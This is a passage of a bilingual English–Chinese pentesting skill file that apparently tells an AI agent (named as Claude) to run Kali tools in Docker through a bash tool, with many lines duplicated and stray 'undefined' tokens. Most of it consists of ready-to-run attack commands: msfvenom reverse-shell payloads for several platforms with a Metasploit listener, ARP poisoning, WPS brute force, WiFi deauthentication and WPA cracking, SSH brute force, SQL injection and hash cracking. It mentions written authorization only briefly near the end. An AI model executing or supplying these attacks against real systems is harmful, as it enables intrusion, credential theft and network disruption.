docker exec kali wifite
docker exec kali wifite
Specific target
Specific target
docker exec kali wifite -i wlan0 --kill
undefineddocker exec kali wifite -i wlan0 --kill
undefinedreaver - WPS Attack
reaver - WPS攻击工具
Description: Brute force WPS PINs.
Usage:
bash
docker exec kali reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv说明: 暴力破解WPS PIN码。
用法:
bash
docker exec kali reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv🕵️ Information Gathering
🕵️ 信息收集
theharvester - Email/Subdomain Harvester
theharvester - 邮箱/子域名收集工具
Description: Gather emails, subdomains, IPs from public sources.
Usage:
bash
undefined说明: 从公共来源收集邮箱、子域名、IP地址。
用法:
bash
undefinedSearch all sources
Search all sources
docker exec kali theharvester -d target.com -b all
docker exec kali theharvester -d target.com -b all
Specific source
Specific source
docker exec kali theharvester -d target.com -b google
docker exec kali theharvester -d target.com -b google
Save results
Save results
docker exec kali theharvester -d target.com -b all -f /home/kaliuser/shared/harvest
undefineddocker exec kali theharvester -d target.com -b all -f /home/kaliuser/shared/harvest
undefineddnsrecon - DNS Enumeration
dnsrecon - DNS枚举工具
Description: DNS enumeration and network reconnaissance.
Usage:
bash
undefined说明: DNS枚举与网络侦察工具。
用法:
bash
undefinedStandard enumeration
Standard enumeration
docker exec kali dnsrecon -d target.com
docker exec kali dnsrecon -d target.com
Zone transfer
Zone transfer
docker exec kali dnsrecon -d target.com -a
docker exec kali dnsrecon -d target.com -a
Brute force subdomains
Brute force subdomains
docker exec kali dnsrecon -d target.com -D /usr/share/wordlists/subdomains.txt -t brt
undefineddocker exec kali dnsrecon -d target.com -D /usr/share/wordlists/subdomains.txt -t brt
undefinedsublist3r - Subdomain Enumeration
sublist3r - 子域名枚举工具
Description: Fast subdomain enumeration using OSINT.
Usage:
bash
undefined说明: 基于开源情报的快速子域名枚举工具。
用法:
bash
undefinedBasic enumeration
Basic enumeration
docker exec kali sublist3r -d target.com
docker exec kali sublist3r -d target.com
Enable brute force
Enable brute force
docker exec kali sublist3r -d target.com -b
docker exec kali sublist3r -d target.com -b
Save results
Save results
docker exec kali sublist3r -d target.com -o /home/kaliuser/shared/subdomains.txt
undefineddocker exec kali sublist3r -d target.com -o /home/kaliuser/shared/subdomains.txt
undefinedenum4linux - SMB Enumeration
enum4linux - SMB枚举工具
Description: Tool for enumerating information from Windows and Samba systems.
Usage:
bash
undefined说明: 用于枚举Windows和Samba系统信息的工具。
用法:
bash
undefinedFull enumeration
Full enumeration
docker exec kali enum4linux -a 192.168.1.1
docker exec kali enum4linux -a 192.168.1.1
User enumeration
User enumeration
docker exec kali enum4linux -U 192.168.1.1
docker exec kali enum4linux -U 192.168.1.1
Share enumeration
Share enumeration
docker exec kali enum4linux -S 192.168.1.1
undefineddocker exec kali enum4linux -S 192.168.1.1
undefineddmitry - Deep Information Gathering
dmitry - 深度信息收集工具
Description: Deepmagic Information Gathering Tool.
Usage:
bash
undefined说明: Deepmagic信息收集工具。
用法:
bash
undefinedFull scan
Full scan
docker exec kali dmitry -winsepo /home/kaliuser/shared/dmitry.txt target.com
docker exec kali dmitry -winsepo /home/kaliuser/shared/dmitry.txt target.com
Subdomain search
Subdomain search
docker exec kali dmitry -s target.com
---docker exec kali dmitry -s target.com
---🛡️ Exploitation Frameworks
🛡️ 漏洞利用框架
metasploit-framework - Penetration Testing Framework
metasploit-framework - 渗透测试框架
Description: The world's most used penetration testing framework.
Usage:
bash
undefined说明: 全球使用最广泛的渗透测试框架。
用法:
bash
undefinedStart msfconsole
Start msfconsole
docker exec -it kali msfconsole
docker exec -it kali msfconsole
Generate payload
Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > /home/kaliuser/shared/payload.exe
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > /home/kaliuser/shared/payload.exe
Search exploits
Search exploits
docker exec -it kali bash -c "echo 'search tomcat' | msfconsole -q"
docker exec -it kali bash -c "echo 'search tomcat' | msfconsole -q"
Run resource script
Run resource script
docker exec kali msfconsole -r /home/kaliuser/shared/script.rc
**Common msfvenom payloads:**
```bashdocker exec kali msfconsole -r /home/kaliuser/shared/script.rc
**常用msfvenom载荷:**
```bashWindows reverse shell
Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe
Linux reverse shell
Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf
PHP reverse shell
PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php
Android APK
Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o shell.apk
undefinedmsfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o shell.apk
undefinedsocial-engineer-toolkit (SET)
social-engineer-toolkit (SET)
Description: Social engineering penetration testing framework.
Usage:
bash
undefined说明: 社会工程学渗透测试框架。
用法:
bash
undefinedStart SET
Start SET
docker exec -it kali setoolkit
---docker exec -it kali setoolkit
---🔬 Forensics & Analysis
🔬 取证与分析
binwalk - Firmware Analysis
binwalk - 固件分析工具
Description: Analyze and extract firmware images.
Usage:
bash
undefined说明: 分析和提取固件镜像。
用法:
bash
undefinedScan for embedded files
Scan for embedded files
docker exec kali binwalk /home/kaliuser/shared/firmware.bin
docker exec kali binwalk /home/kaliuser/shared/firmware.bin
Extract files
Extract files
docker exec kali binwalk -e /home/kaliuser/shared/firmware.bin
docker exec kali binwalk -e /home/kaliuser/shared/firmware.bin
Signature scan
Signature scan
docker exec kali binwalk --signature /home/kaliuser/shared/file.bin
undefineddocker exec kali binwalk --signature /home/kaliuser/shared/file.bin
undefinedforemost - File Carving
foremost - 文件恢复工具
Description: Recover files based on headers and footers.
Usage:
bash
undefined说明: 根据文件头和文件尾恢复文件。
用法:
bash
undefinedRecover all file types
Recover all file types
docker exec kali foremost -i /home/kaliuser/shared/image.dd -o /home/kaliuser/shared/recovered
docker exec kali foremost -i /home/kaliuser/shared/image.dd -o /home/kaliuser/shared/recovered
Specific file types
Specific file types
docker exec kali foremost -t jpg,png,pdf -i /home/kaliuser/shared/image.dd -o /home/kaliuser/shared/
undefineddocker exec kali foremost -t jpg,png,pdf -i /home/kaliuser/shared/image.dd -o /home/kaliuser/shared/
undefinedvolatility - Memory Forensics
volatility - 内存取证框架
Description: Advanced memory forensics framework.
Usage:
bash
undefined说明: 高级内存取证框架。
用法:
bash
undefinedGet image info
Get image info
docker exec kali volatility -f /home/kaliuser/shared/memory.dump imageinfo
docker exec kali volatility -f /home/kaliuser/shared/memory.dump imageinfo
List processes
List processes
docker exec kali volatility -f /home/kaliuser/shared/memory.dump --profile=Win7SP1x64 pslist
docker exec kali volatility -f /home/kaliuser/shared/memory.dump --profile=Win7SP1x64 pslist
Dump process
Dump process
docker exec kali volatility -f /home/kaliuser/shared/memory.dump --profile=Win7SP1x64 procdump -p 1234 -D /home/kaliuser/shared/
undefineddocker exec kali volatility -f /home/kaliuser/shared/memory.dump --profile=Win7SP1x64 procdump -p 1234 -D /home/kaliuser/shared/
undefinedstrings - Extract Strings
strings - 字符串提取工具
Description: Extract printable strings from files.
Usage:
bash
undefined说明: 从文件中提取可打印字符串。
用法:
bash
undefinedBasic extraction
Basic extraction
docker exec kali strings /home/kaliuser/shared/binary > /home/kaliuser/shared/strings.txt
docker exec kali strings /home/kaliuser/shared/binary > /home/kaliuser/shared/strings.txt
Minimum length 10
Minimum length 10
docker exec kali strings -n 10 /home/kaliuser/shared/binary
docker exec kali strings -n 10 /home/kaliuser/shared/binary
Unicode strings
Unicode strings
docker exec kali strings -e l /home/kaliuser/shared/binary
undefineddocker exec kali strings -e l /home/kaliuser/shared/binary
undefinedexiftool - Metadata Extraction
exiftool - 元数据提取工具
Description: Read and write meta information in files.
Usage:
bash
undefined说明: 读取和写入文件中的元信息。
用法:
bash
undefinedView metadata
View metadata
docker exec kali exiftool /home/kaliuser/shared/image.jpg
docker exec kali exiftool /home/kaliuser/shared/image.jpg
Remove all metadata
Remove all metadata
docker exec kali exiftool -all= /home/kaliuser/shared/image.jpg
docker exec kali exiftool -all= /home/kaliuser/shared/image.jpg
Batch process
Batch process
docker exec kali exiftool /home/kaliuser/shared/*.jpg
---docker exec kali exiftool /home/kaliuser/shared/*.jpg
---🔄 Reverse Engineering
🔄 逆向工程
ghidra - Software Reverse Engineering
ghidra - 软件逆向工程框架
Description: NSA's software reverse engineering framework.
Usage:
bash
undefined说明: NSA开发的软件逆向工程框架。
用法:
bash
undefinedGUI mode (requires X11 forwarding)
GUI mode (requires X11 forwarding)
docker exec -it kali ghidra
docker exec -it kali ghidra
Headless mode
Headless mode
docker exec kali analyzeHeadless /workspace /project -import /home/kaliuser/shared/binary.exe
undefineddocker exec kali analyzeHeadless /workspace /project -import /home/kaliuser/shared/binary.exe
undefinedradare2 - Reverse Engineering Framework
radare2 - 逆向工程框架
Description: Advanced reverse engineering framework.
Usage:
bash
undefined说明: 高级逆向工程框架。
用法:
bash
undefinedOpen binary
Open binary
docker exec -it kali r2 /home/kaliuser/shared/binary
docker exec -it kali r2 /home/kaliuser/shared/binary
Analyze
Analyze
docker exec -it kali bash -c "echo 'aaa; pdf' | r2 /home/kaliuser/shared/binary"
docker exec -it kali bash -c "echo 'aaa; pdf' | r2 /home/kaliuser/shared/binary"
Disassemble
Disassemble
docker exec kali r2 -c 'pd 10' /home/kaliuser/shared/binary
undefineddocker exec kali r2 -c 'pd 10' /home/kaliuser/shared/binary
undefinedgdb - GNU Debugger
gdb - GNU调试器
Description: Standard debugger for Unix systems.
Usage:
bash
undefined说明: Unix系统的标准调试器。
用法:
bash
undefinedDebug binary
Debug binary
docker exec -it kali gdb /home/kaliuser/shared/binary
docker exec -it kali gdb /home/kaliuser/shared/binary
With PEDA
With PEDA
docker exec -it kali gdb -q /home/kaliuser/shared/binary
---docker exec -it kali gdb -q /home/kaliuser/shared/binary
---🎯 Vulnerability Assessment
🎯 漏洞评估
lynis - Security Auditing
lynis - 安全审计工具
Description: Security auditing tool for Unix/Linux systems.
Usage:
bash
undefined说明: Unix/Linux系统的安全审计工具。
用法:
bash
undefinedFull audit
Full audit
docker exec kali lynis audit system
docker exec kali lynis audit system
Quick scan
Quick scan
docker exec kali lynis audit system --quick
undefineddocker exec kali lynis audit system --quick
undefinednikto - Web Vulnerability Scanner
nikto - Web漏洞扫描器
(See Web Application Testing section)
(详见Web应用测试章节)
openvas - Vulnerability Scanner
openvas - 漏洞扫描器
Description: Full-featured vulnerability scanner.
Usage:
bash
undefined说明: 全功能漏洞扫描器。
用法:
bash
undefinedStart OpenVAS (requires initialization)
Start OpenVAS (requires initialization)
docker exec kali openvas-start
---docker exec kali openvas-start
---📊 Network Analysis
📊 网络分析
tcpdump - Packet Capture
tcpdump - 数据包捕获工具
Description: Command-line packet analyzer.
Usage:
bash
undefined说明: 命令行数据包分析器。
用法:
bash
undefinedCapture on interface
Capture on interface
docker exec kali tcpdump -i eth0
docker exec kali tcpdump -i eth0
Capture to file
Capture to file
docker exec kali tcpdump -i eth0 -w /home/kaliuser/shared/capture.pcap
docker exec kali tcpdump -i eth0 -w /home/kaliuser/shared/capture.pcap
Read file
Read file
docker exec kali tcpdump -r /home/kaliuser/shared/capture.pcap
docker exec kali tcpdump -r /home/kaliuser/shared/capture.pcap
Filter HTTP
Filter HTTP
docker exec kali tcpdump -i eth0 'tcp port 80'
undefineddocker exec kali tcpdump -i eth0 'tcp port 80'
undefinedtshark - Network Protocol Analyzer
tshark - 网络协议分析器
Description: Terminal-based Wireshark.
Usage:
bash
undefined说明: 终端版Wireshark。
用法:
bash
undefinedCapture packets
Capture packets
docker exec kali tshark -i eth0
docker exec kali tshark -i eth0
Capture to file
Capture to file
docker exec kali tshark -i eth0 -w /home/kaliuser/shared/capture.pcap
docker exec kali tshark -i eth0 -w /home/kaliuser/shared/capture.pcap
Filter display
Filter display
docker exec kali tshark -r /home/kaliuser/shared/capture.pcap -Y 'http.request'
undefineddocker exec kali tshark -r /home/kaliuser/shared/capture.pcap -Y 'http.request'
undefinedettercap - Network Sniffer/Interceptor
ettercap - 网络嗅探/拦截工具
Description: Comprehensive suite for MITM attacks.
Usage:
bash
undefined说明: 用于中间人攻击的综合套件。
用法:
bash
undefinedText mode
Text mode
docker exec -it kali ettercap -T -i eth0
docker exec -it kali ettercap -T -i eth0
ARP poisoning
ARP poisoning
docker exec kali ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//
---docker exec kali ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//
---Common Pentesting Workflows
常见渗透测试工作流
1. Network Reconnaissance
1. 网络侦察
bash
undefinedbash
undefinedStep 1: Discover live hosts
Step 1: Discover live hosts
docker exec kali nmap -sn 192.168.1.0/24 -oA /home/kaliuser/shared/hosts
docker exec kali nmap -sn 192.168.1.0/24 -oA /home/kaliuser/shared/hosts
Step 2: Port scan discovered hosts
Step 2: Port scan discovered hosts
docker exec kali nmap -sV -p- -iL /home/kaliuser/shared/hosts.txt -oA /home/kaliuser/shared/ports
docker exec kali nmap -sV -p- -iL /home/kaliuser/shared/hosts.txt -oA /home/kaliuser/shared/ports
Step 3: Enumerate services
Step 3: Enumerate services
docker exec kali nmap -sC -sV -p 80,443,22,21 192.168.1.0/24 -oA /home/kaliuser/shared/services
undefineddocker exec kali nmap -sC -sV -p 80,443,22,21 192.168.1.0/24 -oA /home/kaliuser/shared/services
undefined2. Web Application Assessment
2. Web应用评估
bash
undefinedbash
undefinedStep 1: Identify web technologies
Step 1: Identify web technologies
docker exec kali whatweb http://target.com
docker exec kali whatweb http://target.com
Step 2: Directory enumeration
Step 2: Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -o /home/kaliuser/shared/dirs.txt
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -o /home/kaliuser/shared/dirs.txt
Step 3: Vulnerability scan
Step 3: Vulnerability scan
docker exec kali nikto -h http://target.com -o /home/kaliuser/shared/nikto.txt
docker exec kali nikto -h http://target.com -o /home/kaliuser/shared/nikto.txt
Step 4: Test for SQLi
Step 4: Test for SQLi
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch
undefineddocker exec kali sqlmap -u "http://target.com/page?id=1" --batch
undefined3. Password Cracking Workflow
3. 密码破解工作流
bash
undefinedbash
undefinedStep 1: Generate wordlist
Step 1: Generate wordlist
docker exec kali crunch 8 12 -t Pass@@@@ -o /home/kaliuser/shared/wordlist.txt
docker exec kali crunch 8 12 -t Pass@@@@ -o /home/kaliuser/shared/wordlist.txt
Step 2: Crack hashes
Step 2: Crack hashes
docker exec kali john --wordlist=/home/kaliuser/shared/wordlist.txt /home/kaliuser/shared/hashes.txt
docker exec kali john --wordlist=/home/kaliuser/shared/wordlist.txt /home/kaliuser/shared/hashes.txt
Step 3: Network service brute force
Step 3: Network service brute force
docker exec kali hydra -L /home/kaliuser/shared/users.txt -P /home/kaliuser/shared/wordlist.txt ssh://192.168.1.1
undefineddocker exec kali hydra -L /home/kaliuser/shared/users.txt -P /home/kaliuser/shared/wordlist.txt ssh://192.168.1.1
undefined4. Wireless Network Assessment
4. 无线网络评估
bash
undefinedbash
undefinedStep 1: Enable monitor mode
Step 1: Enable monitor mode
docker exec kali airmon-ng start wlan0
docker exec kali airmon-ng start wlan0
Step 2: Scan networks
Step 2: Scan networks
docker exec kali airodump-ng wlan0mon
docker exec kali airodump-ng wlan0mon
Step 3: Capture handshake
Step 3: Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kaliuser/shared/capture wlan0mon
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kaliuser/shared/capture wlan0mon
Step 4: Deauth clients
Step 4: Deauth clients
docker exec kali aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
docker exec kali aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
Step 5: Crack WPA
Step 5: Crack WPA
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kaliuser/shared/capture-01.cap
undefineddocker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kaliuser/shared/capture-01.cap
undefined5. Exploitation Workflow
5. 漏洞利用工作流
bash
undefinedbash
undefinedStep 1: Search for exploit
Step 1: Search for exploit
docker exec kali searchsploit apache 2.4.49
docker exec kali searchsploit apache 2.4.49
Step 2: Generate payload
Step 2: Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /home/kaliuser/shared/payload.exe
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /home/kaliuser/shared/payload.exe
Step 3: Setup listener in Metasploit
Step 3: Setup listener in Metasploit
docker exec -it kali msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; exploit"
---docker exec -it kali msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; exploit"
---File Management
文件管理
Copying Files Between Host and Container
在主机与容器之间复制文件
Note: Files in mounted volumes are automatically synced - no need to use !
docker cpbash
undefined注意: 挂载卷中的文件会自动同步 - 无需使用!
docker cpbash
undefinedFiles are automatically available on both sides:
Files are automatically available on both sides:
Save in container → Appears in ./shared/ on host immediately
Save in container → Appears in ./shared/ on host immediately
docker exec kali nmap -sV target -oA /home/kaliuser/shared/scan
docker exec kali nmap -sV target -oA /home/kaliuser/shared/scan
Access on host
Access on host
cat ./shared/scan.nmap
cat ./shared/scan.nmap
Add files from host → Available in container immediately
Add files from host → Available in container immediately
echo "target1.com" > ./shared/targets.txt
docker exec kali cat /home/kaliuser/shared/targets.txt
echo "target1.com" > ./shared/targets.txt
docker exec kali cat /home/kaliuser/shared/targets.txt
Only use docker cp for non-mounted paths
Only use docker cp for non-mounted paths
docker cp kali:/tmp/some-file.txt ./
docker cp ./local-file.txt kali:/tmp/
undefineddocker cp kali:/tmp/some-file.txt ./
docker cp ./local-file.txt kali:/tmp/
undefinedWorking with Wordlists
字典使用
Common Wordlist Locations:
- - Most popular password list
/usr/share/wordlists/rockyou.txt - - Common directories
/usr/share/wordlists/dirb/common.txt - - SecLists collection
/usr/share/seclists/ - - Metasploit wordlists
/usr/share/wordlists/metasploit/
bash
undefined常见字典位置:
- - 最流行的密码字典
/usr/share/wordlists/rockyou.txt - - 常见目录字典
/usr/share/wordlists/dirb/common.txt - - SecLists完整集合
/usr/share/seclists/
bash
undefinedList available wordlists
List available wordlists
docker exec kali find /usr/share/wordlists -type f
docker exec kali find /usr/share/wordlists -type f
Extract rockyou (if gzipped)
Extract rockyou (if gzipped)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz
---docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz
---Troubleshooting
故障排除
Container Won't Start
容器无法启动
bash
undefinedbash
undefinedCheck logs
Check logs
docker logs kali
docker logs kali
Remove and recreate
Remove and recreate
docker rm kali
docker run -d --name kali kali-comprehensive
undefineddocker rm kali
docker run -d --name kali kali-comprehensive
undefinedNetwork Issues
网络问题
bash
undefinedbash
undefinedUse host network
Use host network
docker run -d --name kali --network host kali-comprehensive
docker run -d --name kali --network host kali-comprehensive
Add network capabilities
Add network capabilities
docker run -d --name kali --cap-add=NET_RAW --cap-add=NET_ADMIN kali-comprehensive
undefineddocker run -d --name kali --cap-add=NET_RAW --cap-add=NET_ADMIN kali-comprehensive
undefinedPermission Issues
权限问题
bash
undefinedbash
undefinedRun as root (already default)
Run as root (already default)
docker exec -u root kali [command]
docker exec -u root kali [command]
Fix workspace permissions
Fix workspace permissions
docker exec kali chmod -R 777 /workspace /results
undefineddocker exec kali chmod -R 777 /workspace /results
undefinedMetasploit Database Issues
Metasploit数据库问题
bash
undefinedbash
undefinedInitialize database
Initialize database
docker exec kali service postgresql start
docker exec kali msfdb init
docker exec kali service postgresql start
docker exec kali msfdb init
Check status
Check status
docker exec kali msfdb status
---docker exec kali msfdb status
---Best Practices
最佳实践
1. ALWAYS Save Results to /home/kaliuser/shared/
1. 始终将结果保存到/home/kaliuser/shared/
MANDATORY: Every command MUST save output to the shared volume with timestamps:
bash
undefined强制要求: 每个命令必须将输出保存到共享卷,并使用时间戳:
bash
undefined✅ CORRECT - Output saved to shared volume with timestamp
✅ CORRECT - Output saved to shared volume with timestamp
docker exec kali bash -c 'nmap -sV target -oA /home/kaliuser/shared/scan_$(date +%Y%m%d_%H%M%S)'
docker exec kali bash -c 'nmap -sV target -oA /home/kaliuser/shared/scan_$(date +%Y%m%d_%H%M%S)'
❌ WRONG - Output not saved (lost on container restart)
❌ WRONG - Output not saved (lost on container restart)
docker exec kali nmap -sV target
docker exec kali nmap -sV target
✅ CORRECT - Redirect to shared volume
✅ CORRECT - Redirect to shared volume
docker exec kali whatweb target.com | tee /home/kaliuser/shared/whatweb_$(date +%Y%m%d_%H%M%S).txt
docker exec kali whatweb target.com | tee /home/kaliuser/shared/whatweb_$(date +%Y%m%d_%H%M%S).txt
Standard output flags (always use /home/kaliuser/shared/)
Standard output flags (always use /home/kaliuser/shared/)
-o /home/kaliuser/shared/file_$(date +%Y%m%d_%H%M%S).txt # Generic output
-oA /home/kaliuser/shared/scan_$(date +%Y%m%d_%H%M%S) # Nmap: all formats
-w /home/kaliuser/shared/capture_$(date +%Y%m%d_%H%M%S).pcap # Capture files
undefined-o /home/kaliuser/shared/file_$(date +%Y%m%d_%H%M%S).txt # Generic output
-oA /home/kaliuser/shared/scan_$(date +%Y%m%d_%H%M%S) # Nmap: all formats
-w /home/kaliuser/shared/capture_$(date +%Y%m%d_%H%M%S).pcap # Capture files
undefined2. Organize by Tool and Date
2. 按工具和日期组织
Create organized directories for better result management:
bash
undefined创建结构化目录以更好地管理结果:
bash
undefinedCreate directory structure
Create directory structure
docker exec kali mkdir -p /home/kaliuser/shared/{nmap,web,passwords,wireless,exploitation}/$(date +%Y%m%d)
docker exec kali mkdir -p /home/kaliuser/shared/{nmap,web,passwords,wireless,exploitation}/$(date +%Y%m%d)
Save to organized locations
Save to organized locations
docker exec kali bash -c 'nmap -sV target -oA /home/kaliuser/shared/nmap/$(date +%Y%m%d)/scan_$(date +%H%M%S)'
**Mounted volumes:**
- `./shared/` ↔ `/home/kaliuser/shared/` - ALL scan results and outputs (MANDATORY)
- `./wordlists/` ↔ `/home/kaliuser/wordlists/` - Custom wordlists only
- Built-in wordlists: `/usr/share/wordlists/` (rockyou, seclists, dirb, etc.)docker exec kali bash -c 'nmap -sV target -oA /home/kaliuser/shared/nmap/$(date +%Y%m%d)/scan_$(date +%H%M%S)'
**挂载卷说明:**
- `./shared/` ↔ `/home/kaliuser/shared/` - 所有扫描结果和输出(强制要求)
- `./wordlists/` ↔ `/home/kaliuser/wordlists/` - 仅自定义字典
- 内置字典:`/usr/share/wordlists/`(rockyou、seclists、dirb等)3. Scope Your Testing
3. 明确测试范围
Always:
- Get written authorization
- Define scope boundaries
- Document everything
- Report findings responsibly
始终:
- 获取书面授权
- 定义范围边界
- 记录所有操作
- 负责任地报告发现
4. Clean Up After Testing
4. 测试后清理
bash
undefinedbash
undefinedStop monitor mode
Stop monitor mode
docker exec kali airmon-ng stop wlan0mon
docker exec kali airmon-ng stop wlan0mon
Clear temporary files
Clear temporary files
docker exec kali rm -rf /tmp/*
docker exec kali rm -rf /tmp/*
Archive results
Archive results
docker exec kali tar -czf /home/kaliuser/shared/assessment-$(date +%Y%m%d).tar.gz /home/kaliuser/shared/*.txt
---docker exec kali tar -czf /home/kaliuser/shared/assessment-$(date +%Y%m%d).tar.gz /home/kaliuser/shared/*.txt
---Quick Reference
快速参考
Port Scanning
端口扫描
bash
docker exec kali nmap -sV -p- targetbash
docker exec kali nmap -sV -p- targetDirectory Enumeration
目录枚举
bash
docker exec kali gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txtbash
docker exec kali gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txtSQL Injection
SQL注入测试
bash
docker exec kali sqlmap -u "http://target/page?id=1" --batchbash
docker exec kali sqlmap -u "http://target/page?id=1" --batchPassword Cracking
密码破解
bash
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txtbash
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txtNetwork Brute Force
网络暴力破解
bash
docker exec kali hydra -l admin -P passwords.txt ssh://targetbash
docker exec kali hydra -l admin -P passwords.txt ssh://targetWiFi Cracking
WiFi破解
bash
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.capbash
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.capWhen to Use This Skill
何时使用本技能
Use this skill when:
- Conducting authorized penetration testing
- Performing security assessments
- Testing network security
- Analyzing web applications
- Cracking passwords (authorized)
- Wireless security auditing
- Forensics analysis
- Reverse engineering
- Learning security techniques
Claude will read this skill and execute commands via bash_tool, providing efficient, direct access to all pentesting tools without MCP protocol overhead.
在以下场景使用本技能:
- 进行授权渗透测试
- 执行安全评估
- 测试网络安全
- 分析Web应用
- 授权破解密码
- 无线安全审计
- 取证分析
- 逆向工程
- 学习安全技术
Claude会读取本技能并通过bash_tool执行命令,无需MCP协议开销即可高效访问所有渗透测试工具。